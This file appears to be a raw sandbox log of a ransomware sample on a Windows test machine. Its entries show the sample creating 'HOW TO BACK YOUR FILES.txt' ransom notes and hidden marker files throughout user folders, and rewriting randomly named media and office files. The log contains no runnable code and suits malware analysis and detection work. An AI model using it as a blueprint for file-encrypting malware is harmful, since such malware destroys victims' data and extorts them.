Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.IE5\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\0V n6rYTpHpdA3E65ees.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\12BcEHtQ0V38CA9zYhL.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\1Y0UN5hynKhytGvOu.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\AICpHn.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\d57ide9nP.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\dtLMm0n.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\ej27UGYl-.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\EmjD9XD RJD4w7EHy6.ppt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\EwTVv.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\fR2yAN Ii_9.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\fxbPqybTufBl8GXXE.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\HggFk6UK.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\HX1-Y1fy.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\j0plGyI Tzt4g.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\jA0vE43xnVQwXozy.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\Kk_im1au5TCOJfL.odt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\LAFLIJsVjKK-O.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\lVAbllj.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\MVqkf6GOhxTXr.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\OK_-vR.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\PpqV.avi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\pU76_oHg8.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\qsiIC5quFGp.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\rv4A_L21ZRdO.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\TIP8JVRUCFz6SzbPuG.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\TMyzIkMwWICmieV.csv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\UH3p_ZuzzXV1NtEd6s.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\UQ6xqw365P.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\XvrOiP2wT.doc desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\Y4HO9nidsAl5O.ppt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\SettingsContainer\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Licenses\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Fonts\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\PeerDistRepub\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\PeerDistRepub\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\Temp\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\Temp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetHistory\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetHistory\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCookies\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCookies\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCache\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG1 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
